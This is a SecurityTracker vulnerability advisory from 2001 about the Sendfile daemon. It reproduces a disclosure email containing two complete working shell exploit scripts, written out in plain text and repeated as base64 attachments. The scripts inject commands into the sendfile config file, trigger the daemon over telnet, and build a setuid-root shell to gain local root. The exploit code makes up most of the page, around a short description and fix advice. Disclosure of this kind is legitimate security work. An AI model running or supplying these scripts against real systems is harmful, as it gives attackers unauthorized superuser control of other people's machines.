Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
Sendfile Package Still Vulnerable to Holes That Allow Remote Users to Execute Arbitrary Code and Gain Root Privileges
|
|
SecurityTracker Alert ID: 1001550 |
|
SecurityTracker URL: http://securitytracker.com/id/1001550
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: May 15 2001
|
Impact:
Execution of arbitrary code via network, Root access via network
|
Exploit Included: Yes
|
|
Description:
It is reported that vulnerabilities still exist in the Sendfile package that allow remote users to execute arbitrary code on the server and gain root-level privileges. It is reported that a fix had been released earlier for one of these vulnerabilities, but the fix was apparently broken.
It appears that these problems do not exist in the vendor's source code but do exist in certain packages.
Two demonstration exploit scripts are included in the Source Message.
The author of the advisory notes that the vulnerability exploited by the "sfdfwd.sh" script was supposed to have been fixed by the patches provided in Debian Security Advisory DSA-050-1 and then DSA-052-1, but that these patches did not fix the problem.
The author also notes that a second bug has been discovered and reported to Debian but has not been corrected. This vulnerability is reportedly the result of a serialization error combined with a lack of error checking.
|
Impact:
A remote user can cause arbitrary code to be executed by the server.
|
Solution:
The author of the advisory recommends that anyone using this package should download the most recent copy of the source code directly from the author's site and manually compile it, or apply the patch used in Debian-unstable (sendfile_2.1-25). Up-to-date copies of the source can apparently be obtained from ftp://ftp.belwue.de/pub/unix/sendfile/current
|
Vendor URL: www.belwue.de/aktivitaeten/projekte/saft/index-us.html (Links to External Site)
|
Cause:
Access control error, Exception handling error, State error
|
Underlying OS:
Linux (Any), UNIX (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Tue, 15 May 2001 09:10:49 -0700 (MDT)
Subject: Sendfile daemon bugs
|
--Hushpart_boundary_GukWoYKuBtOcoIAUGcatDzBUgcJVTMvC
Content-type: text/plain
I have attached two simple scripts which exploit vulnerabilities which exist
in the some versions of the Sendfile daemon, both allow a local attacker
to gain superuser privileges.
The bug exploited by sfdfwd.sh was supposed to have been fixed by the patches
provided in Debian Security Advisory DSA-050-1 and then DSA-052-1 and was
reported by Colin Phipps in November 2000, somehow it has still not been
fixed. The second bug has been reported (without any success) to Debian,
it is the result of a serialization error combined with a lack of error
checking.
Anyone using this package should download the most recent copy of the source
code directly from the author's site and manually compile it, or apply the
patch used in Debian-unstable (sendfile_2.1-25). Up-to-date copies of the
source can be obtained from ftp://ftp.belwue.de/pub/unix/sendfile/current
-- MIME attachments have been decoded by SecurityTracker for your convenience --
#!/bin/sh
#
# sfdfwd - Sendfile daemon local arbitrary command execution vulnerability
#
# references:
# http://www.securityfocus.com/bid/2645
# http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=76048
#
# 04/24/01 psheep
SFUSER=$USER
SFHOST=localhost
SFPORT=saft
SFSPOOL=/var/spool/sendfile
SFUSERCFG="$SFSPOOL/$SFUSER/config/config"
echo "Sendfile daemon local arbitrary command execution exploit"
echo
echo " username = $SFUSER"
echo " spool directory = $SFSPOOL"
echo " config file = $SFUSERCFG"
echo " target hostname = $SFHOST"
echo " target port = $SFPORT"
echo
if ! test -d $SFSPOOL; then
echo "** unable to locate the sendfile spool directory, exiting"
exit 1
fi
sfsavedcfg="no"
if ! test -d $SFSPOOL/$SFUSER || ! test -d $SFSPOOL/$SFUSER/config; then
echo "** attempting to create sendfile spool directory for $SFUSER"
echo
(sleep 1;echo "TO $SFUSER";sleep 2) | telnet $SFHOST $SFPORT
echo
else
if test -f $SFUSERCFG; then
echo "** backing up your sendfile daemon configuration file"
mv $SFUSERCFG $SFSPOOL/$SFUSER/config/config.tmp
sfsavedcfg="yes"
fi
fi
cat > sfdfwd.c << EOF
#include <unistd.h>
#include <stdlib.h>
int main() {
setreuid(0,0);
setgid(0);
system("chown root.root $PWD/sfdsh;chmod 4755 $PWD/sfdsh");
}
EOF
cat > sfdsh.c << EOF
#include <unistd.h>
int main() {
setreuid(0,0);
setgid(0);
execl("/bin/sh", "sh", NULL);
}
EOF
echo "** compiling helper application as $PWD/sfdfwd"
cc -o $PWD/sfdfwd $PWD/sfdfwd.c
if ! test -x $PWD/sfdfwd; then
echo "** compilation failed, exiting"
exit 1
fi
echo "** compiling shell wrapper as $PWD/sfdsh"
cc -o $PWD/sfdsh $PWD/sfdsh.c
if ! test -x $PWD/sfdsh; then
echo "** compilation failed, exiting"
exit 1
fi
echo "** inserting commands into temporary configuration file"
echo "forward = |$PWD/sfdfwd" >$SFUSERCFG
echo "** attempting attack against sendfile daemon..."
echo
(sleep 1;cat << EOF
FROM $USER
TO $USER
FILE boom$RANDOM
SIZE 0 0
DATA
QUIT
EOF
sleep 2) | telnet $SFHOST $SFPORT
echo
if test "x$sfsavedcfg" = xyes; then
echo "** restoring backed up configuration file"
mv $SFSPOOL/$SFUSER/config/config.tmp $SFUSERCFG
else
echo "** removing temporary configuration file"
rm $SFUSERCFG
fi
echo "** done, the shell wrapper should be suid root"
echo
exit 1
#!/bin/sh
#
# sfdnfy - Sendfile daemon local arbitrary command execution vulnerability
#
# references:
# http://www.securityfocus.com/bid/2652
# http://www.securityfocus.com/bid/2631
#
# 04/24/01 psheep
SFUSER=$USER
SFHOST=localhost
SFPORT=saft
SFSPOOL=/var/spool/sendfile
SFUSERCFG="$SFSPOOL/$SFUSER/config/config"
echo "Sendfile daemon local arbitrary command execution vulnerability"
echo
echo " username = $SFUSER"
echo " spool directory = $SFSPOOL"
echo " config file = $SFUSERCFG"
echo " target hostname = $SFHOST"
echo " target port = $SFPORT"
echo
if ! test -d $SFSPOOL; then
echo "** unable to locate the sendfile spool directory, exiting"
exit 1
fi
sfsavedcfg="no"
if ! test -d $SFSPOOL/$SFUSER || ! test -d $SFSPOOL/$SFUSER/config; then
echo "** attempting to create sendfile spool directory for $SFUSER"
echo
(sleep 1;echo "TO $SFUSER";sleep 2) | telnet $SFHOST $SFPORT
echo
else
if test -f $SFUSERCFG; then
echo "** backing up your sendfile daemon configuration file"
mv $SFUSERCFG $SFSPOOL/$SFUSER/config/config.tmp
sfsavedcfg="yes"
fi
fi
cat > sfdnfy.c << EOF
#include <unistd.h>
#include <stdlib.h>
int main() {
setreuid(0,0);
setgid(0);
system("chown root.root $PWD/sfdsh;chmod 4755 $PWD/sfdsh");
}
EOF
cat > sfdsh.c << EOF
#include <unistd.h>
int main() {
setreuid(0,0);
setgid(0);
execl("/bin/sh", "sh", NULL);
}
EOF
echo "** compiling helper application as $PWD/sfdnfy"
cc -o $PWD/sfdnfy $PWD/sfdnfy.c
if ! test -x $PWD/sfdnfy; then
echo "** compilation failed, exiting"
exit 1
fi
echo "** compiling shell wrapper as $PWD/sfdsh"
cc -o $PWD/sfdsh $PWD/sfdsh.c
if ! test -x $PWD/sfdsh; then
echo "** compilation failed, exiting"
exit 1
fi
echo "** inserting commands into temporary configuration file"
echo "notification = mail $USER;$PWD/sfdnfy" >$SFUSERCFG
echo "** attempting attack against sendfile daemon..."
echo
(sleep 1;cat << EOF
FROM $USER
TO $USER
FILE boom$RANDOM
SIZE 0 0
DATA
FILE boom$RANDOM
SIZE 1 0
DATA
EOF
sleep 2) | telnet $SFHOST $SFPORT
echo
if test "x$sfsavedcfg" = xyes; then
echo "** restoring backed up configuration file"
mv $SFSPOOL/$SFUSER/config/config.tmp $SFUSERCFG
else
echo "** removing temporary configuration file"
rm $SFUSERCFG
fi
echo "** done, the shell wrapper should be suid root after the mailer is done"
echo
exit 1
Free, encrypted, secure Web-based email at www.hushmail.com
--Hushpart_boundary_GukWoYKuBtOcoIAUGcatDzBUgcJVTMvC
Content-Disposition: attachment
Content-type: application/octet-stream; name="sfdfwd.sh"
Content-Transfer-Encoding: base64
IyEvYmluL3NoCiMKIyBzZmRmd2QgLSBTZW5kZmlsZSBkYWVtb24gbG9jYWwgYXJiaXRy
YXJ5IGNvbW1hbmQgZXhlY3V0aW9uIHZ1bG5lcmFiaWxpdHkgCiMKIyByZWZlcmVuY2Vz
OgojICAgaHR0cDovL3d3dy5zZWN1cml0eWZvY3VzLmNvbS9iaWQvMjY0NQojICAgaHR0
cDovL2J1Z3MuZGViaWFuLm9yZy9jZ2ktYmluL2J1Z3JlcG9ydC5jZ2k/YnVnPTc2MDQ4
CiMKIyAwNC8yNC8wMSBwc2hlZXAKClNGVVNFUj0kVVNFUgpTRkhPU1Q9bG9jYWxob3N0
ClNGUE9SVD1zYWZ0ClNGU1BPT0w9L3Zhci9zcG9vbC9zZW5kZmlsZQpTRlVTRVJDRkc9
IiRTRlNQT09MLyRTRlVTRVIvY29uZmlnL2NvbmZpZyIKCmVjaG8gIlNlbmRmaWxlIGRh
ZW1vbiBsb2NhbCBhcmJpdHJhcnkgY29tbWFuZCBleGVjdXRpb24gZXhwbG9pdCIKZWNo
bwplY2hvICIgIHVzZXJuYW1lICAgICAgICA9ICRTRlVTRVIiCmVjaG8gIiAgc3Bvb2wg
ZGlyZWN0b3J5ID0gJFNGU1BPT0wiCmVjaG8gIiAgY29uZmlnIGZpbGUgICAgID0gJFNG
VVNFUkNGRyIKZWNobyAiICB0YXJnZXQgaG9zdG5hbWUgPSAkU0ZIT1NUIgplY2hvICIg
IHRhcmdldCBwb3J0ICAgICA9ICRTRlBPUlQiCmVjaG8KCmlmICEgdGVzdCAtZCAkU0ZT
UE9PTDsgdGhlbgogIGVjaG8gIioqIHVuYWJsZSB0byBsb2NhdGUgdGhlIHNlbmRmaWxl
IHNwb29sIGRpcmVjdG9yeSwgZXhpdGluZyIKICBleGl0IDEKZmkKCnNmc2F2ZWRjZmc9
Im5vIgoKaWYgISB0ZXN0IC1kICRTRlNQT09MLyRTRlVTRVIgfHwgISB0ZXN0IC1kICRT
RlNQT09MLyRTRlVTRVIvY29uZmlnOyB0aGVuCiAgZWNobyAiKiogYXR0ZW1wdGluZyB0
byBjcmVhdGUgc2VuZGZpbGUgc3Bvb2wgZGlyZWN0b3J5IGZvciAkU0ZVU0VSIgogIGVj
aG8KICAoc2xlZXAgMTtlY2hvICJUTyAkU0ZVU0VSIjtzbGVlcCAyKSB8IHRlbG5ldCAk
U0ZIT1NUICRTRlBPUlQKICBlY2hvCmVsc2UKICBpZiB0ZXN0IC1mICRTRlVTRVJDRkc7
IHRoZW4KICAgIGVjaG8gIioqIGJhY2tpbmcgdXAgeW91ciBzZW5kZmlsZSBkYWVtb24g
Y29uZmlndXJhdGlvbiBmaWxlIgogICAgbXYgJFNGVVNFUkNGRyAkU0ZTUE9PTC8kU0ZV
U0VSL2NvbmZpZy9jb25maWcudG1wCiAgICBzZnNhdmVkY2ZnPSJ5ZXMiCiAgZmkKZmkK
CmNhdCA+IHNmZGZ3ZC5jIDw8IEVPRgojaW5jbHVkZSA8dW5pc3RkLmg+CiNpbmNsdWRl
IDxzdGRsaWIuaD4KCmludCBtYWluKCkgewogICAgc2V0cmV1aWQoMCwwKTsKICAgIHNl
dGdpZCgwKTsKICAgIHN5c3RlbSgiY2hvd24gcm9vdC5yb290ICRQV0Qvc2Zkc2g7Y2ht
b2QgNDc1NSAkUFdEL3NmZHNoIik7Cn0KRU9GCgpjYXQgPiBzZmRzaC5jIDw8IEVPRgoj
aW5jbHVkZSA8dW5pc3RkLmg+CgppbnQgbWFpbigpIHsKICAgIHNldHJldWlkKDAsMCk7
CiAgICBzZXRnaWQoMCk7CiAgICBleGVjbCgiL2Jpbi9zaCIsICJzaCIsIE5VTEwpOwp9
CkVPRgoKZWNobyAiKiogY29tcGlsaW5nIGhlbHBlciBhcHBsaWNhdGlvbiBhcyAkUFdE
L3NmZGZ3ZCIKY2MgLW8gJFBXRC9zZmRmd2QgJFBXRC9zZmRmd2QuYwoKaWYgISB0ZXN0
IC14ICRQV0Qvc2ZkZndkOyB0aGVuCiAgZWNobyAiKiogY29tcGlsYXRpb24gZmFpbGVk
LCBleGl0aW5nIgogIGV4aXQgMQpmaQoKZWNobyAiKiogY29tcGlsaW5nIHNoZWxsIHdy
YXBwZXIgYXMgJFBXRC9zZmRzaCIKY2MgLW8gJFBXRC9zZmRzaCAkUFdEL3NmZHNoLmMK
CmlmICEgdGVzdCAteCAkUFdEL3NmZHNoOyB0aGVuCiAgZWNobyAiKiogY29tcGlsYXRp
b24gZmFpbGVkLCBleGl0aW5nIgogIGV4aXQgMQpmaQoKZWNobyAiKiogaW5zZXJ0aW5n
IGNvbW1hbmRzIGludG8gdGVtcG9yYXJ5IGNvbmZpZ3VyYXRpb24gZmlsZSIKZWNobyAi
Zm9yd2FyZCA9IHwkUFdEL3NmZGZ3ZCIgPiRTRlVTRVJDRkcKCmVjaG8gIioqIGF0dGVt
cHRpbmcgYXR0YWNrIGFnYWluc3Qgc2VuZGZpbGUgZGFlbW9uLi4uIgplY2hvCgooc2xl
ZXAgMTtjYXQgPDwgRU9GCkZST00gJFVTRVIKVE8gJFVTRVIKRklMRSBib29tJFJBTkRP
TQpTSVpFIDAgMApEQVRBClFVSVQKRU9GCnNsZWVwIDIpIHwgdGVsbmV0ICRTRkhPU1Qg
JFNGUE9SVAplY2hvCgppZiB0ZXN0ICJ4JHNmc2F2ZWRjZmciID0geHllczsgdGhlbgog
IGVjaG8gIioqIHJlc3RvcmluZyBiYWNrZWQgdXAgY29uZmlndXJhdGlvbiBmaWxlIgog
IG12ICRTRlNQT09MLyRTRlVTRVIvY29uZmlnL2NvbmZpZy50bXAgJFNGVVNFUkNGRwpl
bHNlCiAgZWNobyAiKiogcmVtb3ZpbmcgdGVtcG9yYXJ5IGNvbmZpZ3VyYXRpb24gZmls
ZSIKICBybSAkU0ZVU0VSQ0ZHCmZpCgplY2hvICIqKiBkb25lLCB0aGUgc2hlbGwgd3Jh
cHBlciBzaG91bGQgYmUgc3VpZCByb290IgplY2hvCmV4aXQgMQo=
--Hushpart_boundary_GukWoYKuBtOcoIAUGcatDzBUgcJVTMvC
Content-Disposition: attachment
Content-type: application/octet-stream; name="sfdnfy.sh"
Content-Transfer-Encoding: base64
IyEvYmluL3NoCiMKIyBzZmRuZnkgLSBTZW5kZmlsZSBkYWVtb24gbG9jYWwgYXJiaXRy
YXJ5IGNvbW1hbmQgZXhlY3V0aW9uIHZ1bG5lcmFiaWxpdHkKIwojIHJlZmVyZW5jZXM6
CiMgICBodHRwOi8vd3d3LnNlY3VyaXR5Zm9jdXMuY29tL2JpZC8yNjUyCiMgICBodHRw
Oi8vd3d3LnNlY3VyaXR5Zm9jdXMuY29tL2JpZC8yNjMxCiMKIyAwNC8yNC8wMSBwc2hl
ZXAKClNGVVNFUj0kVVNFUgpTRkhPU1Q9bG9jYWxob3N0ClNGUE9SVD1zYWZ0ClNGU1BP
T0w9L3Zhci9zcG9vbC9zZW5kZmlsZQpTRlVTRVJDRkc9IiRTRlNQT09MLyRTRlVTRVIv
Y29uZmlnL2NvbmZpZyIKCmVjaG8gIlNlbmRmaWxlIGRhZW1vbiBsb2NhbCBhcmJpdHJh
cnkgY29tbWFuZCBleGVjdXRpb24gdnVsbmVyYWJpbGl0eSIKZWNobwplY2hvICIgIHVz
ZXJuYW1lICAgICAgICA9ICRTRlVTRVIiCmVjaG8gIiAgc3Bvb2wgZGlyZWN0b3J5ID0g
JFNGU1BPT0wiCmVjaG8gIiAgY29uZmlnIGZpbGUgICAgID0gJFNGVVNFUkNGRyIKZWNo
byAiICB0YXJnZXQgaG9zdG5hbWUgPSAkU0ZIT1NUIgplY2hvICIgIHRhcmdldCBwb3J0
ICAgICA9ICRTRlBPUlQiCmVjaG8KCmlmICEgdGVzdCAtZCAkU0ZTUE9PTDsgdGhlbgog
IGVjaG8gIioqIHVuYWJsZSB0byBsb2NhdGUgdGhlIHNlbmRmaWxlIHNwb29sIGRpcmVj
dG9yeSwgZXhpdGluZyIKICBleGl0IDEKZmkKCnNmc2F2ZWRjZmc9Im5vIgoKaWYgISB0
ZXN0IC1kICRTRlNQT09MLyRTRlVTRVIgfHwgISB0ZXN0IC1kICRTRlNQT09MLyRTRlVT
RVIvY29uZmlnOyB0aGVuCiAgZWNobyAiKiogYXR0ZW1wdGluZyB0byBjcmVhdGUgc2Vu
ZGZpbGUgc3Bvb2wgZGlyZWN0b3J5IGZvciAkU0ZVU0VSIgogIGVjaG8KICAoc2xlZXAg
MTtlY2hvICJUTyAkU0ZVU0VSIjtzbGVlcCAyKSB8IHRlbG5ldCAkU0ZIT1NUICRTRlBP
UlQKICBlY2hvCmVsc2UKICBpZiB0ZXN0IC1mICRTRlVTRVJDRkc7IHRoZW4KICAgIGVj
aG8gIioqIGJhY2tpbmcgdXAgeW91ciBzZW5kZmlsZSBkYWVtb24gY29uZmlndXJhdGlv
biBmaWxlIgogICAgbXYgJFNGVVNFUkNGRyAkU0ZTUE9PTC8kU0ZVU0VSL2NvbmZpZy9j
b25maWcudG1wCiAgICBzZnNhdmVkY2ZnPSJ5ZXMiCiAgZmkKZmkKCmNhdCA+IHNmZG5m
eS5jIDw8IEVPRgojaW5jbHVkZSA8dW5pc3RkLmg+CiNpbmNsdWRlIDxzdGRsaWIuaD4K
CmludCBtYWluKCkgewogICAgc2V0cmV1aWQoMCwwKTsKICAgIHNldGdpZCgwKTsKICAg
IHN5c3RlbSgiY2hvd24gcm9vdC5yb290ICRQV0Qvc2Zkc2g7Y2htb2QgNDc1NSAkUFdE
L3NmZHNoIik7Cn0KRU9GCgpjYXQgPiBzZmRzaC5jIDw8IEVPRgojaW5jbHVkZSA8dW5p
c3RkLmg+CgppbnQgbWFpbigpIHsKICAgIHNldHJldWlkKDAsMCk7CiAgICBzZXRnaWQo
MCk7CiAgICBleGVjbCgiL2Jpbi9zaCIsICJzaCIsIE5VTEwpOwp9CkVPRgoKZWNobyAi
KiogY29tcGlsaW5nIGhlbHBlciBhcHBsaWNhdGlvbiBhcyAkUFdEL3NmZG5meSIKY2Mg
LW8gJFBXRC9zZmRuZnkgJFBXRC9zZmRuZnkuYwoKaWYgISB0ZXN0IC14ICRQV0Qvc2Zk
bmZ5OyB0aGVuCiAgZWNobyAiKiogY29tcGlsYXRpb24gZmFpbGVkLCBleGl0aW5nIgog
IGV4aXQgMQpmaQoKZWNobyAiKiogY29tcGlsaW5nIHNoZWxsIHdyYXBwZXIgYXMgJFBX
RC9zZmRzaCIKY2MgLW8gJFBXRC9zZmRzaCAkUFdEL3NmZHNoLmMKCmlmICEgdGVzdCAt
eCAkUFdEL3NmZHNoOyB0aGVuCiAgZWNobyAiKiogY29tcGlsYXRpb24gZmFpbGVkLCBl
eGl0aW5nIgogIGV4aXQgMQpmaQoKZWNobyAiKiogaW5zZXJ0aW5nIGNvbW1hbmRzIGlu
dG8gdGVtcG9yYXJ5IGNvbmZpZ3VyYXRpb24gZmlsZSIKZWNobyAibm90aWZpY2F0aW9u
ID0gbWFpbCAkVVNFUjskUFdEL3NmZG5meSIgPiRTRlVTRVJDRkcKCmVjaG8gIioqIGF0
dGVtcHRpbmcgYXR0YWNrIGFnYWluc3Qgc2VuZGZpbGUgZGFlbW9uLi4uIgplY2hvCgoo
c2xlZXAgMTtjYXQgPDwgRU9GCkZST00gJFVTRVIKVE8gJFVTRVIKRklMRSBib29tJFJB
TkRPTQpTSVpFIDAgMApEQVRBCkZJTEUgYm9vbSRSQU5ET00KU0laRSAxIDAKREFUQQpF
T0YKc2xlZXAgMikgfCB0ZWxuZXQgJFNGSE9TVCAkU0ZQT1JUCmVjaG8KCmlmIHRlc3Qg
Ingkc2ZzYXZlZGNmZyIgPSB4eWVzOyB0aGVuCiAgZWNobyAiKiogcmVzdG9yaW5nIGJh
Y2tlZCB1cCBjb25maWd1cmF0aW9uIGZpbGUiCiAgbXYgJFNGU1BPT0wvJFNGVVNFUi9j
b25maWcvY29uZmlnLnRtcCAkU0ZVU0VSQ0ZHCmVsc2UKICBlY2hvICIqKiByZW1vdmlu
ZyB0ZW1wb3JhcnkgY29uZmlndXJhdGlvbiBmaWxlIgogIHJtICRTRlVTRVJDRkcKZmkK
CmVjaG8gIioqIGRvbmUsIHRoZSBzaGVsbCB3cmFwcGVyIHNob3VsZCBiZSBzdWlkIHJv
b3QgYWZ0ZXIgdGhlIG1haWxlciBpcyBkb25lIgplY2hvCmV4aXQgMQo=
--Hushpart_boundary_GukWoYKuBtOcoIAUGcatDzBUgcJVTMvC--
IMPORTANT NOTICE: If you are not using HushMail, this message could have been read easily by the many people who have access to your
open personal email messages.
Get your FREE, totally secure email address at http://www.hushmail.com.
|
|
Go to the Top of This SecurityTracker Archive Page
|
